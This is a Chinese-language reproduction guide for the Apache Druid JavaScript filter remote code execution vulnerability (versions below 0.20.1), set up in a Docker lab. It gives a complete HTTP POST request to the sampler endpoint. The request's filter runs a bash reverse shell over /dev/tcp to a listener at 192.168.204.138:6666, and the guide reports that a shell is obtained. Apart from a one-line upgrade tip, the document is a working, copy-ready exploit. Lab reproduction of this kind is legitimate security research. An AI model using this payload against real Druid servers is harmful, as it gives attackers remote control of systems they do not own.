漏洞概述
Apache Druid 是用Java編寫的面向列的開源分佈式數據存儲,旨在快速獲取大量事件數據,並在數據之上提供低延遲查詢。
Apache Druid 默認情況下缺乏授權認證,攻擊者可以發送特製請求,利用Druid服務器上進程的特權執行任意代碼。
影響版本
Apache Druid < 0.20.1
環境搭建
這裏使用docker來搭建
拉取鏡像並啓動Apache Druid:0.16.0版本的環境
docker pull fokkodriesprong/docker-druid
docker run --rm -i -p 8888:8888 fokkodriesprong/docker-druid
訪問your-ip:8888即可看到頁面
漏洞復現
點擊Load data -> Local disk
依次填入
Base directory:
quickstart/tutorial/
File filter:
wikiticker-2015-09-12-sampled.json.gz
默認next
到filter項
抓包修改filter爲
{ "type":"javascript", "function":"function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/192.168.204.138/6666 0>&1
')}", "dimension":"added", "":{ "enabled":"true" }}
然後發送POST數據包
POST /druid/indexer/v1/sampler?for=schema HTTP/1.1
Host: 192.168.204.138:8888
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 1018
Origin: http://192.168.204.138:8888
Connection: close
Referer: http://192.168.204.138:8888/unified-console.html
{"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript",
"function":"function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/192.168.204.138/6666 0>&1')}",
"dimension":"added",
"":{
"enabled":"true"
}
}}}},"samplerConfig":{"numRows":500,"cacheKey":"79a5be988bf94d42a6f219b63ff27383"}}
成功反彈shell
修復建議
升級到安全版本